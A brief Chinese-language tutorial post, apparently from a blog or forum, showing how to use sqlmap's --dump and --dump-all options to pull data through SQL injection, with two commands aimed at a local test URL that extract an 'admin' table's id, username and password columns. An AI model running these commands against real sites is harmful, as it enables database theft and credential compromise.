之前就有一个朋友问,咋使用sqlmap脱裤。然后我丢了一个参数给他,他好像懵逼懵逼的。今天又有一个哥们儿在群里问,行吧。就直接教一下。
其实很简单。
--dump这个参数就是用来脱裤的哟。如果你要拖整个表的话你可以加个-all(--dump-all)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dump -D sqlinject -T admin -C "id,username,password"
脱出数据如下所示:
仅一个文件。就是你选定了的数据。
那么我们加all呢?(PS:此时可以把那些字段都给去掉。)
CODE:
sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D sqlinject --dump-all
可见如下是三个文件。
这三个文件是啥呢?解惑便是下图所示。